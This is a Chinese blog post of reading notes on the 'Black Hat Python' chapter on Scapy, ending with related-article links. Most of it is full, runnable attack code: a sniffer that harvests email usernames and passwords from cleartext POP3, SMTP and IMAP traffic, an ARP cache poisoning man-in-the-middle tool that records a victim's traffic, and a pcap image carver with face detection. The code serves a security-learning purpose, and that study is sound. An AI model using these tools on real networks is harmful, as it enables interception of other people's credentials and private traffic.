读书笔记 -《Python 黑帽子》 ( 三 )
2016-02-18 23:42
537 查看
读书笔记系列文章
一直都在读书,读了忘,忘了再读。不如把每次学到的东西都写下来第四章 Scapy: 网络的掌控者
Scapy 的十分强大的,前两章的东西可以用 Scapy 用简单的几行代码就能实现。BPF,pcap 文件这些基本通用的东西在阅读本章前最后先自己补充一下。Scapy有一个非常强大的功能就是读取 pcap 文件,然后对其中的会话做重组。在写嗅探工具的时候,要么用 libnids来做 tcp 的重组,要不自己写代码重组,这也是我一直在纠结的一些东西。scapy 以一种非常简单的方式提供了这样的功能。
窃取 Email 认证
作者首先用这一章简单介绍了 scapy 的威力。email 使用的就是 SMTP、POP3、IMAP这些协议,这些协议里面使用了一些明文的关键字,通过这些关键字,可以找到用户名、密码这样的信息。
思路就是使用 scapy 来做嗅探,使用 BPF 过滤一些数据,然后在这些数据里面找关键字。
代码也是很简单易懂,其中TCP 是 Scapy 定义的, packet 也是捉取数据后的参数,一个类实例。
读代码注释就可以了,不需要更多的解释
import threading from scapy.all import * # our packet callback def packet_callback(packet): if packet[TCP].payload: mail_packet = str(packet[TCP].payload) if "user" in mail_packet.lower() or "pass" in mail_packet.lower(): print "[*] Server: %s" % packet[IP].dst print "[*] %s" % packet[TCP].payload # fire up our sniffer sniff(filter="tcp port 110 or tcp " "" "" " 25 or tcp port 143", prn=packet_callback, store=0)
利用 Scapy 进行 ARP 缓存投毒
作者说『ARP 投毒是黑客工具箱中最古老最有效的攻击方式之一』。原理也是很简单,通过发送 arp 报文,欺骗目标机,使目标机以为,拥有网关 ip 地址的 mac 地址,为黑客所使用的机器的 mac 地址。这样目标机会把所有流量发给黑客而不是网关。黑客开启 ip 转发功能,把目标机发送过来的数据转发给网关,这应在不影响目标机上网的情况下,拿到了目标机的所有发出的流量,通过嗅探,可以分析发现这些流量中的内容。本节的内容就是写一个 arp 欺骗的工具
from scapy.all import * import os import sys import threading interface = "en1" target_ip = "172.16.1.71" gateway_ip = "172.16.1.254" packet_count = 1000 poisoning = True def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): # slightly different method using send print "[*] Restoring target..." send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5) def get_mac(ip_address): responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) # return the MAC address from a response for s,r in responses: return r[Ether].src return None def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): global poisoning poison_target = ARP() poison_target.op = 2 poison_target.psrc = gateway_ip poison_target.pdst = target_ip poison_target.hwdst= target_mac poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = target_ip poison_gateway.pdst = gateway_ip poison_gateway.hwdst= gateway_mac print "[*] Beginning the ARP poison. [CTRL-C to stop]" while poisoning: send(poison_target) send(poison_gateway) time.sleep(2) print "[*] ARP poison attack finished." return # set our interface conf.iface = interface # turn off output conf.verb = 0 print "[*] Setting up %s" % interface gateway_mac = get_mac(gateway_ip) if gateway_mac is None: print "[!!!] Failed to get gateway MAC. Exiting." sys.exit(0) else: print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac) target_mac = get_mac(target_ip) if target_mac is None: print "[!!!] Failed to get target MAC. Exiting." sys.exit(0) else: print "[*] Target %s is at %s" % (target_ip,target_mac) # start poison thread poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac)) poison_thread.start() try: print "[*] Starting sniffer for %d packets" % packet_count bpf_filter = "ip host %s" % target_ip packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) except KeyboardInterrupt: pass finally: # write out the captured packets print "[*] Writing packets to arper.pcap" wrpcap('arper.pcap',packets) poisoning = False # wait for poisoning thread to exit time.sleep(2) # restore the network restore_target(gateway_ip,gateway_mac,target_ip,target_mac) sys.exit(0)
处理 PCAP 文件
这一节的内容我感觉是比较多,不太那么纯粹了,竟然利用 opencv 来做人脸识别。这一节代码的功能是提取 pcap 文件中的 tcp 会话,从中找到 http 数据,再找到图片数据,把图片存入本地,然后使用 opencv 识别这些图片,查看这些图片是不是人脸。
这一节我最欣赏的是 scpay 对会话重组功能实现的,真的是非常好用,其它的功能不是那么吸引人了。
根据我描述的功能,再去读这些代码就比较简单了。具体的实现细节涉及到了 opencv 的使用,http 协议的格式等。不了解这些知识,自己上网搜索补充后,就能看懂了。
import re import zlib import cv2 from scapy.all import * pictures_directory = "pic_carver/pictures" faces_directory = "pic_carver/faces" pcap_file = "bhp.pcap" def face_detect(path,file_name): img = cv2.imread(path) cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml") rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20)) if len(rects) == 0: return False rects[:, 2:] += rects[:, :2] # highlight the faces in the image for x1,y1,x2,y2 in rects: cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2) cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img) return True def get_http_headers(http_payload): try: # split the headers off if it is HTTP traffic headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2] # break out the headers headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw)) except: return None if "Content-Type" not in headers: return None return headers def extract_image(headers,http_payload): image = None image_type = None try: if "image" in headers['Content-Type']: # grab the image type and image body image_type = headers['Content-Type'].split("/")[1] image = http_payload[http_payload.index("\r\n\r\n")+4:] # if we detect compression decompress the image try: if "Content-Encoding" in headers.keys(): if headers['Content-Encoding'] == "gzip": image = zlib.decompress(image,16+zlib.MAX_WBITS) elif headers['Content-Encoding'] == "deflate": image = zlib.decompress(image) except: pass except: return None,None return image,image_type def http_assembler(pcap_file): carved_images = 0 faces_detected = 0 a = rdpcap(pcap_file) sessions = a.sessions() for session in sessions: http_payload = "" for packet in sessions[session]: try: if packet[TCP].dport == 80 or packet[TCP].sport == 80: # reassemble the stream into a single buffer http_payload += str(packet[TCP].payload) except: pass headers = get_http_headers(http_payload) if headers is None: continue image,image_type = extract_image(headers,http_payload) if image is not None and image_type is not None: # store the image file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type) fd = open("%s/%s" % (pictures_directory,file_name),"wb") fd.write(image) fd.close() carved_images += 1 # now attempt face detection try: result = face_detect("%s/%s" % (pictures_directory,file_name),file_name) if result is True: faces_detected += 1 except: pass return carved_images, faces_detected carved_images, faces_detected = http_assembler(pcap_file) print "Extracted: %d images" % carved_images print "Detected: %d faces" % faces_detected
相关文章推荐
- android wifi 无线调试
- Python动态类型的学习---引用的理解
- Python3写爬虫(四)多线程实现数据爬取
- 垃圾邮件过滤器 python简单实现
- 下载并遍历 names.txt 文件,输出长度最长的回文人名。
- install and upgrade scrapy
- Scrapy的架构介绍
- Centos6 编译安装Python
- 使用Python生成Excel格式的图片
- 让Python文件也可以当bat文件运行
- [Python]推算数独
- Python中zip()函数用法举例
- Python中map()函数浅析
- Python将excel导入到mysql中
- Python在CAM软件Genesis2000中的应用
- 使用Shiboken为C++和Qt库创建Python绑定
- FREEBASIC 编译可被python调用的dll函数示例